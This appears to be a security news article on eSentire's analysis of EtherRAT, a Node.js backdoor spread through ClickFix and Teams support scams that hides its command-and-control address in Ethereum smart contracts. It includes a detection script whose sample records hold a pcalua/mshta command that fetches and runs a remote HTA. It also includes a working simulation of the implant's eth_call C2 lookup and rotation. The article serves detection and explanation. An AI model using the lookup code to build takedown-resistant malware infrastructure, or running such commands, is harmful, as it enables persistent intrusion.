Attack Diagram | Image: eSentire Threat Response Unit
In a blend of social engineering and decentralized technology, eSentire’s Threat Response Unit (TRU) recently detected a new wave of EtherRAT malware targeting the retail industry. The Node.js-based backdoor is reportedly linked to North Korean advanced persistent threat (APT) groups and uses the Ethereum blockchain to make its command-and-control (C2) infrastructure resistant to takedown.
The attack begins with high-pressure social engineering. TRU observed ClickFix lures (a fake error or verification prompt that walks the victim through pasting a command into a Run dialog or terminal) and IT support scams, often conducted over Microsoft Teams, to trick victims into executing the initial command themselves.
The execution chain leans on living-off-the-land binaries at every step:
- Initial Access: The command the victim is tricked into running invokes pcalua.exe, the Program Compatibility Assistant launcher, a signed Windows binary that starts an arbitrary program via its -a switch. This is MITRE ATT&CK Indirect Command Execution (T1202): the malicious HTA stage is retrieved and run under a trusted parent process, which sidesteps detections keyed on a user or script host launching the HTA directly.
- Stealthy Deployment: The infection proceeds through several stages, each delivered as an AES-256-CBC-encrypted blob that the previous stage decrypts and runs. As the analysis notes, “The first stage Node.js script simply decrypts/executes the next stage”.
- Persistence: EtherRAT keeps its foothold through a Windows Registry entry that relaunches the payload via conhost.exe with its --headless switch, so the Node.js process is spawned by a trusted system binary without a visible console window.
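The three LOLBin patterns above are the cheap hunting signal in this chain. The following is an added example, not code from eSentire’s report or from the malware: a small detection pass over process-creation records shaped like the chain described. The record fields (parent, image, cmdline) and every sample value, including the paths and the example.invalid hostname, are constructed for illustration; real telemetry (Sysmon Event ID 1, EDR process events) carries equivalent fields under other names.

```javascript
// Added example: rule-based detection of the EtherRAT-style LOLBin chain
// (pcalua.exe proxying an HTA launch, conhost.exe --headless spawning node.exe)
// over constructed process-creation records. Not code from the report.

function basename(p) {
  // Last path component, lower-cased, for either slash style.
  return (p || "").split(/[\\/]/).pop().toLowerCase();
}

const RULES = [
  {
    id: "pcalua-proxy-exec",
    note: "pcalua.exe used to launch another program (Indirect Command Execution, T1202)",
    match: (e) =>
      basename(e.parent) === "pcalua.exe" ||
      /\bpcalua(\.exe)?\s+-a\b/i.test(e.cmdline),
  },
  {
    id: "conhost-headless",
    note: "conhost.exe --headless spawning a child with no visible console",
    match: (e) =>
      basename(e.image) === "conhost.exe" && /--headless/i.test(e.cmdline),
  },
  {
    id: "node-from-conhost",
    note: "node.exe launched under conhost.exe, consistent with the described persistence",
    match: (e) =>
      basename(e.image) === "node.exe" && basename(e.parent) === "conhost.exe",
  },
];

// Runs every rule over every record; returns one finding per (record, rule) hit.
function evaluate(events) {
  const findings = [];
  events.forEach((e, i) => {
    for (const r of RULES) {
      if (r.match(e)) findings.push({ index: i, rule: r.id, note: r.note, cmdline: e.cmdline });
    }
  });
  return findings;
}

// Constructed sample records (hypothetical paths, file names and hostname).
const SAMPLE_EVENTS = [
  { parent: "C:\\Windows\\explorer.exe", image: "C:\\Windows\\System32\\notepad.exe",
    cmdline: "notepad.exe notes.txt" },
  { parent: "C:\\Windows\\System32\\cmd.exe", image: "C:\\Windows\\System32\\pcalua.exe",
    cmdline: "pcalua.exe -a mshta.exe http://example.invalid/stage.hta" },
  { parent: "C:\\Windows\\System32\\pcalua.exe", image: "C:\\Windows\\System32\\mshta.exe",
    cmdline: "mshta.exe http://example.invalid/stage.hta" },
  { parent: "C:\\Windows\\System32\\cmd.exe", image: "C:\\Windows\\System32\\conhost.exe",
    cmdline: "conhost.exe --headless node.exe C:\\Users\\Public\\stage1.js" },
  { parent: "C:\\Windows\\System32\\conhost.exe", image: "C:\\Users\\Public\\node\\node.exe",
    cmdline: "node.exe C:\\Users\\Public\\stage1.js" },
];

for (const f of evaluate(SAMPLE_EVENTS)) {
  console.log(`[${f.rule}] event ${f.index}: ${f.cmdline}`);
}
```

The first rule fires on both sides of the pcalua hop (the pcalua.exe command line and the child whose parent is pcalua.exe), so it still catches the chain when one of the two records is missing from the telemetry. Expect some benign noise from legitimate compatibility-troubleshooter launches; the conhost --headless and node-under-conhost rules are far rarer in normal fleets and are the ones worth paging on.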
What sets EtherRAT apart is its use of EtherHiding. Instead of hardcoding a server address that law enforcement could easily seize, the malware retrieves its C2 instructions from Ethereum smart contracts.
“EtherRAT allows threat actors to run arbitrary commands on compromised hosts… [and makes] C2 addresses more resilient by storing and updating them in Ethereum smart contracts”.
Reading the contract is a gas-free eth_call to any public Ethereum node, while updating it costs only the gas for a single transaction, so operators can rotate infrastructure cheaply. Because every implant re-reads the current value on check-in, one contract update reasserts control over older infected machines even after the primary server has been taken down.
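To make the mechanism concrete, here is an added example, not EtherRAT’s code or eSentire’s: it shows how a client builds the eth_call JSON-RPC request for a contract getter, decodes the ABI-encoded string the contract returns, and follows a rotation when the stored value changes. The contract address, the in-process stand-in for an RPC endpoint and the C2 strings are constructed assumptions; the getter is given the standard ERC-20 name() signature purely so its 4-byte selector (0x06fdde03) is a known constant and no keccak-256 dependency is needed. The real contract interface is not described in the summary above.

```javascript
// Added example: EtherHiding-style C2 lookup via eth_call, with an in-process
// stand-in for the Ethereum JSON-RPC endpoint. Not code from the report.

const CONTRACT = "0x" + "11".repeat(20); // constructed placeholder contract address
const SELECTOR_NAME = "0x06fdde03";       // keccak256("name()")[0:4], the ERC-20 name() selector

// JSON-RPC body a client sends to read a view function; no transaction, no gas.
function buildEthCall(to, selector, id = 1) {
  return { jsonrpc: "2.0", id, method: "eth_call", params: [{ to, data: selector }, "latest"] };
}

// ABI encoding of a single dynamic `string` return value:
// word 0 = offset to data (0x20), word 1 = byte length, then data padded to 32 bytes.
function encodeAbiString(s) {
  const data = Buffer.from(s, "utf8");
  const padded = Math.ceil(data.length / 32) * 32;
  const out = Buffer.alloc(64 + padded);
  out.writeUInt32BE(32, 28);          // low bytes of word 0: offset 0x20
  out.writeUInt32BE(data.length, 60); // low bytes of word 1: length
  data.copy(out, 64);
  return "0x" + out.toString("hex");
}

// Inverse of the above, with bounds checks so a malformed result cannot
// slice outside the buffer.
function decodeAbiString(hex) {
  const buf = Buffer.from(hex.replace(/^0x/, ""), "hex");
  if (buf.length < 64) throw new Error("short ABI payload");
  const offset = Number(BigInt("0x" + buf.subarray(0, 32).toString("hex")));
  if (offset + 32 > buf.length) throw new Error("ABI offset exceeds payload");
  const length = Number(BigInt("0x" + buf.subarray(offset, offset + 32).toString("hex")));
  if (offset + 32 + length > buf.length) throw new Error("ABI length exceeds payload");
  return buf.subarray(offset + 32, offset + 32 + length).toString("utf8");
}

// Stand-in for the chain: holds the string the contract's getter would return.
// setState models what the operator's (paid) update transaction does.
function makeFakeChain(initial) {
  let stored = initial;
  return {
    setState: (s) => { stored = s; },
    rpc: (req) => {
      if (req.method !== "eth_call" || req.params[0].to !== CONTRACT || req.params[0].data !== SELECTOR_NAME) {
        return { jsonrpc: "2.0", id: req.id, error: { code: -32000, message: "execution reverted" } };
      }
      return { jsonrpc: "2.0", id: req.id, result: encodeAbiString(stored) };
    },
  };
}

// What an implant does on every check-in: ask the contract where C2 lives now.
function fetchC2(chain) {
  const resp = chain.rpc(buildEthCall(CONTRACT, SELECTOR_NAME));
  if (resp.error) throw new Error("eth_call failed: " + resp.error.message);
  return decodeAbiString(resp.result);
}

// Demo with constructed C2 strings: first read, operator rotates, second read follows.
const demoChain = makeFakeChain("c2-a.example.invalid:8443");
console.log("before rotation:", fetchC2(demoChain));
demoChain.setState("c2-b.example.invalid:443");
console.log("after rotation: ", fetchC2(demoChain));
```

The defender’s takeaway is where the fixed points are. The server address is not one of them, but the contract address and the selector are baked into the implant, and the read has to reach some Ethereum RPC endpoint. Outbound eth_call traffic to public gateways from hosts that have no business talking to a blockchain, and the contract address itself, are the indicators worth extracting from a sample; blocking a single gateway achieves little because any node will answer the same query.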
EtherRAT also profiles its victims carefully. Once it compromises a host, it deploys a module dubbed SYS_INFO to perform extensive fingerprinting, collecting everything from GPU names and public IP addresses to installed antivirus software.
Interestingly, the malware also carries a geopolitical filter. Before fully engaging, it checks the host’s language settings for CIS (Commonwealth of Independent States) languages such as Russian, Belarusian or Kazakh. “If any language matches, it ‘self-destructs’ by deleting itself and exiting”.
Modern threats are increasingly leveraging decentralized technologies to outpace infrastructure-based defenses. Since this chain still depends on a person running the first command, vigilance against social engineering, particularly via collaboration tools like Microsoft Teams, remains the first and most effective line of defense.